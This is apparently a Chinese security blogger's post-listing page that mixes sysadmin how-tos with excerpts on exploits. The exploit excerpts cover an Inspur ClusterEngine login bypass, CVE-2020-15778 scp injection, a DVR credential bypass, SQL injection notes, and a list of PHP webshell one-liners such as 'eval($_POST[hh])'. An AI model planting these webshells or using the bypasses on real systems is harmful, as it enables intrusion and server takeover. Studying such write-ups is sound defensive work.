- 博客(137)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 windows10 修改用户名全局生效--最有效快速的办法
直接改设置里面的名字会发现仅有部分功能修改了用户名,并不能全局修改为新的用户名,可以尝试下面的方法。修改用户账户名使用win10的搜索功能,输入netplwiz进入”用户账户“界面,按照下面将用户名和全名修改为新的名字:接下来,需要先开启administrator,然后进行后续操作。开启administrator登录使用win10的搜索功能,输入compmgmt.msc打开计算机管理。计算机管理界面点击“系统工具” 》“本地用户和组” 》 ”用户“ 》 双击"Administ
2021-07-18 18:10:37
858
原创 macos Big Sur 使用proxifier出现无法联网情况
intel版的mac升级为Big Sur后,使用proxifier 3.5 版本,发现经常会出现网络无法连接或者浏览器报DNS错误的问题。大体原因是和Network Extension API有关,具体解决办法,proxifier推出了特别版,链接如下:https://www.proxifier.com/download/bigsur/v2exp.html下载该版本即可解决这个问题。...
2021-06-29 20:33:04
4478
原创 浪潮 ClusterEngineV4.0 任意用户登录+命令执行
概述浪潮clusterengine v4.0 集群管理平台,可管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。在网络空间测绘搜索引擎中搜索关键字:title="TSCEV4.0"或者"clusterengine v4.0"收集相关资产。任意用户登录指定登录过程中的username字段值为"any|pwd"形式即可登录系统:POST /login HTTP/1.1Host: xxxCo
2021-04-12 23:28:02
2221
1
原创 解决python pip 安装报语法错误sys.stderr.write(f“ERROR: {exc}“)
ubuntu16中,python3.5在安装pip时,用apt 进行安装后,运行会出现下面这样的语法错误:可以使用下面方法安装以前的pip版本解决:wget https://bootstrap.pypa.io/3.5/get-pip.pypython3 get-pip.py
2021-01-27 16:22:53
50976
44
原创 centos7 中java、go、python环境安装指南
搞技术的肯定都得有几台虚拟机,同时也得弄几个vps。不管是开发还是做网络安全(脚本小子),linux机器是必备,一般选ubuntu或者centos 7,每次装个系统,都需要重新装一遍环境,这里以centos 7为例简单记录下安装java8 jdk1.8、python3.8.3、go1.15.1语言环境的方式。java8安装任何程序前,先对系统做下更新操作:yum -y update安装java 8yum install java-1.8.0-openjdk执行下面命令验证是否安装成功:[r
2020-09-09 00:02:30
907
原创 OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)
该文章英文简单易懂,虽翻译之,大佬们轻喷文章首发公众号:striveben前言OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令,不过前提是需要知道ssh的登录密码。OpenSSh是用于使用SSH(Secure SHell)协议进行加密远程登录的免费开源实现。它可以有效保护登录及数据的安全。SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。影响范围OpenSSH.
2020-08-02 17:56:07
7403
7
原创 centos7 虚拟机没有网解决办法
在vmware中安装完centos7后,发现没有网络,需要手动开启:进入到如下目录:cd /etc/sysconfig/network-scripts然后编辑以下文件:vi ifcfg-enp0s3将该文件中的ONBOOT=no修改为ONBOOT=yes即可。最后重启服务即可连接到网络。service network restart执行ifconfig提示没有命令,需要安装n...
2020-04-18 21:17:42
729
原创 UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-2: ordinal not in range(128)
python项目在windows下正常运行,但是在linux下会报如下错误:这是因为linux的系统编码的问题,可以用如下代码查看当前系统的编码:>>> import sys>>> sys.stdout.encoding'ANSI_X3.4-1968'一条bash命令就能解决这个问题:export PYTHONIOENCODING=utf-8...
2020-02-20 22:15:06
695
原创 CVE-2019-0708复现总结
周末有空便复现了下0708的洞,没想到到处是坑,而且这个漏洞有点鸡肋~~看其他师傅用win7复现的,能一次成功的几乎没有,可能是exp不稳定吧;但是我一直蓝屏,从未弹成功。。。环境搭建ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A...
2019-09-22 22:29:26
1452
原创 adb报错unauthorized/offline 怎么办
问题使用adb时,使用命令查看链接设备:adb devices经常如下错误:List of devices attached83a0ee4 offline解决办法首先升级到尽量新的adb版本,如 adb v 1.0.41;其次查看 5037 端口是否占用:netstat -aon | findstr 5037taskkill /pid pid /f // 删除占用端口的...
2019-09-19 23:40:01
307
原创 mac os 安装metasploit v5.0.23(msf)
安装metasploitgit clone https://github.com/rapid7/metasploit-framework.gitcd metasploit-framework./msfconsole执行上面的命令时,报如下错误,需要对bundler进行更新。[*] Bundler failed to load and returned this error: '...
2019-05-22 23:38:26
6207
原创 Windows ".contact"文件 HTML 链接注入远程执行代码
欢迎加技术交流群(363034250),共同进步哈。漏洞描述该漏洞位置是在创建联系人信息时,未对输入的电子邮件地址和网站内容进行严格的限制,导致HTML链接注入远程执行代码。漏洞复现影响系统:Windows 10,Windows 8,Windows 7和Windows Vista首先桌面右键,创建联系人:基本信息按需要填写,在电子邮件和网站一栏,分别填入可执行代码(弹出计算器):...
2019-01-24 16:22:32
928
原创 windows 任意文件读取漏洞复现
在复现windows 的最新0day(任意用户下,可以读取任意文件)之前,先简单介绍下windows 下用户管理需要的基本命令。文章首发公众号,欢迎大家关注,并进技术交流群(363034250),共同进步哈。windows 用户管理基本命令查看用户net user查看所有用户:查看用户权限net user xxx该命令可以查看用户的权限,如下图,在本地组成员...
2019-01-02 00:03:09
2410
原创 一次对asp+fck的简单渗透
最近一直没有更新文章,各位久等了。今天忙里偷闲,谷歌到了一个练手的网站,简单和大家分享下。文章首发本人公众号,如果感兴趣请在文末扫码添加。信息收集众所周知哈,渗透的第一步,也是很重要的一步,就是信息收集,通过这一步,找到了真实ip,服务器以及中间件版本(iis 7.5)同时看了下端口开放情况,都是常规端口,没啥异常,然后对该网站进行目录扫描发现了网站后台地址,如下图:不过没有后台密码,就先...
2018-12-25 00:16:55
554
原创 Homebrew 安装以及更新源替换
安装xcode如果安装app store里面的xcode,会发现很大(6G多)在终端执行:xcode-select --install如果没有安装过xcode,会弹出个窗口,点击安装即可,如下图:安装后再重新执行xcode-select --install会出现如下结果:Homebrew 安装/usr/bin/ruby -e "$(curl -fsSL https://raw....
2018-11-17 21:23:14
2164
原创 打不开 /dev/vmmon: 断裂管道 请确保已载入内核模块 ’vmmon’
使用VMware fusion 安装虚拟机系统,一直显示“打不开 /dev/vmmon: 断裂管道 请确保已载入内核模块 ’vmmon’”网上的命令试了一大堆,都不行,原来关键点在这,如下图所示:打开 设置 -> 安全性与隐私 -> 通用“在允许从以下位置下载的应用”中,选择“任何来源”,同时会在下面显示关于fusion是否被允许,选在允许即可。...
2018-11-17 19:49:03
70251
28
原创 Vulnhub Node:1 详解
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250信息收集arp-scan 用来发现系统和指纹识别的命令行工具。从结果中可以看到node的ip是”192.168.92.129”使用nmap对端口进行探测,如下图所示:可知开放的端口有2个,分别是:22和3000,其中3000是个web服务;详细banner信息...
2018-09-03 22:39:34
1271
原创 docker 基本使用--常用命令
dokcer 常用命令如果你想将一个容器转换为镜像,可以:docker commit <container -id> name(对该镜像的命名)docker run 中的 –rm :使用该命令,docker能在该container结束时自动清理其所产生的数据,适用于需要短期运行一个前台container;创建并连接容器、端口映射、绑定随机iddocker r...
2018-06-27 20:37:09
2182
原创 DVR登录绕过漏洞复现(CVE-2018-9995)
DVR登录绕过(CVE-2018-9995)欢迎进群交流技术: 363034250前言前两天关于DVR登录绕过的漏洞文章就有了,最近看到了它的POC,是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我也尝试了一下,屡试不爽…漏洞复现感觉问题在,这些DVR的cookie都好简单,”uid=admin”,然后凭证都是明文…...
2018-05-11 14:48:46
4916
1
转载 非对称加密和对称加密的区别
对称加密(Symmetric Cryptography),又称私钥加密 对称加密是最快速、最简单的一种加密方式,加密(encryption)与解密(decryption)用的是同样的密钥(secret key),这种方法在密码学中叫做对称加密算法。对称加密有很多种算法,由于它效率很高,所以被广泛使用在很多加密协议的核心当中。对称加密通常使用的是相对较小的密钥,一般小于256 bit。因为密钥越大...
2018-05-09 15:07:48
767
转载 HTTP头部详解
HTTP头部详解欢迎进群交流: 363034250HTTP(HyperTextTransferProtocol)是超文本传输协议的缩写,它用于传送WWW方式的数据,关于HTTP 协议的详细内容请参考RFC2616。HTTP协议采用了请求/响应模型。客户端向服务器发送一个请求,请求头包含请求的方法、URI、协议版本、以及包含请求修饰符、客户信息和内容的类似于MIME的消息结构。服务器以一个状...
2018-05-07 22:30:02
3292
原创 ciscn 2018 部分writeup
ciscn 2018 部分writeupflag in your hand这是一道js解密的题目:发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了:跟踪bm函数:这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码;在ck函数里,ic的值又被更改了,所以要想...
2018-05-07 10:26:19
3800
1
原创 常见一句话收集
前言收集常见的asp,php,jsp,aspx 的一句话木马 欢迎进群交流: 363034250php <?php eval($_POST[hh])?> <?php @eval($_POST[hh])?> <?$_POST['sa']($_POST['sb']);?> <?$_POST['sa']($_...
2018-04-26 07:29:02
488
原创 load data infile函数使用
mysql中load data file 使用欢迎进群交流: 363034250前言 有时候我们需要将大量数据批量写入数据库,直接使用程序语言和Sql写入往往很耗时间,其中有一种方案就是使用MySql Load data infile导入文件的形式导入数据,这样可大大缩短数据导入时间。基本语法load data [low_priority] [loc...
2018-04-24 22:06:40
4801
原创 Web常用的绝对路径收集
常用的绝对路径收集欢迎进群交流: 363034250Linux 绝对路径 描述 /etc/httpd/conf/httpd.conf 查看linux apache虚拟主机配置文件 /usr/local/apche/conf/httpd.conf 查看linux apache虚拟主机配置文件 /usr/local/resin/conf/re...
2018-04-24 12:01:40
2774
原创 第二届强网杯 web签到题
前言线上赛的时候,没有充裕的时间打,后期做了做,虽以记之.时间好快,2018已经过去了1/4,加油.欢迎进群交流: 363034250题目及知识点题目描述该题目一共分为三关,前两关都是基本的php中md5()函数特性利用.下面分别对每一关进行解析.第一关源码<h2>The Fisrt Easy Md5 Challenge</...
2018-04-02 22:26:49
2541
1
原创 sqlmap 基本使用手册
Sqlmap基本使用手册最近在学习如何更好地使用sqlmap,操作是在kali上进行的,遇到了一些问题,同大家分享。kali下sqlmap升级进入到sqlmap的安装目录cd /usr/share/sqlmap初始化仓库git init添加sqlmap地址git remote add origin https://github.com/sqlmapproject/sqlmap.git最后执行sqlm
2018-03-30 11:46:06
5229
原创 报错型盲注原理分析
前言众所周知,盲注并不会返回错误信息,使得sql注入的难度提高。而报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类型的数据库也存在相应的问题,在此我...
2018-03-26 19:33:05
690
转载 mysql注入的一些基础知识
mysql注入的一些基础知识。(1)注入的分类下面这个是阿德玛表哥的一段话,个人认为分类已经是够全面了。理解不了跳过,当你完全看完整个学习过程后再回头看这段。能完全理解下面的这些每个分类,对每个分类有属于你的认知和了解的时候,你就算是小有成就了,当然仅仅是sql注入上。基于从服务器接收到的响应 ▲基于错误的SQL注入▲联合查询的类型▲堆查询注射▲SQL盲注•基于...
2018-03-26 16:37:11
299
原创 2017强网杯 web部分题解
0x01 我是谁,我在哪,我要做什么?##### 1.1 题目连接http://106.75.72.168:2222/1.2分析题目提示没有权限Sorry. You have no permissions.burp抓包,看到cookie中有roleGET / HTTP/1.1Host: 106.75.72.168:2222User-Agent: M...
2018-03-25 00:03:15
5031
原创 sql手动注入常用步骤
前言提起sql注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互.有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等预备知识对mysql数据库有一定了解;对基本的sql语句有所了解;对url编码有了解:空格=‘%...
2018-03-22 14:17:12
12956
原创 kali apt 更新时显示校验数字签名时出错。
最近遇到kali下更新软件时,总是报错,说下列签名无效: EXPKEYSIG ED444FF07D8D0BF6 Kali Linux Repository [email protected]解决办法就是重新获取下签名keywget -q -O - https://archive.kali.org/archive-key.asc | apt-key add...
2018-03-18 09:54:52
6474
原创 Wfuzz 使用
前言Wfuzz是网站模糊测试爆破工具。https://github.com/xmendez/wfuzzwfuzz不仅仅是一个web扫描器:wfuzz能够通过发现并利用网站弱点/漏洞的方式帮助你使网站更加安全。wfuzz的漏洞扫描功能由插件支持。wfuzz是一个完全模块化的框架,这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事,通常...
2018-03-17 21:41:47
6902
原创 Wfuzz 使用
前言Wfuzz是网站模糊测试爆破工具。https://github.com/xmendez/wfuzzwfuzz不仅仅是一个web扫描器:wfuzz能够通过发现并利用网站弱点/漏洞的方式帮助你使网站更加安全。wfuzz的漏洞扫描功能由插件支持。wfuzz是一个完全模块化的框架,这使得即使是Python初学者也能够进行开发和贡献代码。开发一个wfuzz插件是一件非常简单的事,通常...
2018-03-17 19:43:35
1499
原创 Hack the box invited code(邀请码获取)
0x00Hack The Box 一个在线的渗透测试平台。0x01访问网址https://www.hackthebox.eu/invite0x02打开console ,输入 makeInviteCode()后,在post响应中获取到一串base64编码:注意这里有的是 Va beqre gb trarengr gur vaivgr pbqr,...
2018-03-15 15:21:18
44268
10
原创 铁三测试赛
你是管理员吗?1.下载password.txt 2.使用intruder爆破登录密码为’Nsf0cuS’ 3.登录并使用burp抓包 4.在’Set-Cookie’中可以看到newpage参数值HTTP/1.1 200 OKServer: nginxDate: Thu, 08 Mar 2018 07:24:40 GMTContent-Type: text/htmlConn...
2018-03-08 17:22:49
1880
原创 编译原理-翻译布尔表达式
0x01 题目描述Input 多组输入,每组输入为一行字符串,例如: a < b or c < d and e < f每个符号都用空格间隔Output 假链跳到0,真链跳到1,表达式序号从100开始排。Example Input1a < b or c < d and e < fExample Output100(j<,a,b,1)101(j,_,_,102)102(j<,c,d,10
2017-12-06 00:23:07
5309
原创 编译原理-递归子程序法
0x01 题目描述递归子程序法是一种确定的自顶向下语法分析方法,要求文法是LL(1)文法。它的实现思想是对应文法中每个非终结符编写一个递归过程,每个过程的功能是识别由该非终结符推出的串,当某非终结符的产生式有多个候选式时能够按LL(1)形式唯一地确定选择某个候选式进行推导。请根据下面的表达式LL(1)文法,构造递归子程序,完成对表达式的语法分析。表达式文法如下: E→TG G→+TG |
2017-12-05 21:54:43
4696
原创 编译原理-词法分析程序1
0x00 前言最近在学编译原理,一个简单的词法分析程序。0x01 题目描述小C语言文法 1. <程序>→(){<声明序列><语句序列>}2. <声明序列>→<声明序列><声明语句>|<声明语句>|<空>3. <声明语句>→<标识符表>;4. <标识符表>→<标识符>,<标识符表>|<标识符>5. <语句序列>→<语句序列><语句>|<语句>6. <语句>→< if语句>|< while语
2017-12-05 13:29:45
643
转载 2017年乌镇互联网大会嘉宾分享要点实录
一直关注每一年的乌镇互联网大会,但是没有时间整理成文章分享给大家,只能转载一个我觉得记录得很全的文章。关注每一个互联网大会,了解未来IT发展方向,开阔视野,确定自己的学习方向,增加学习动力。1. 嘉宾致辞:1.1 苹果首席执行官 库克 Cook:很多人都在谈论 AI,我并不担心机器人会像人一样思考,我担心人像机器一样思考!我们相信 AR 能够帮助人们工作,而且帮助人们在教育医疗有所突破,让世界更加
2017-12-04 22:57:19
536
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人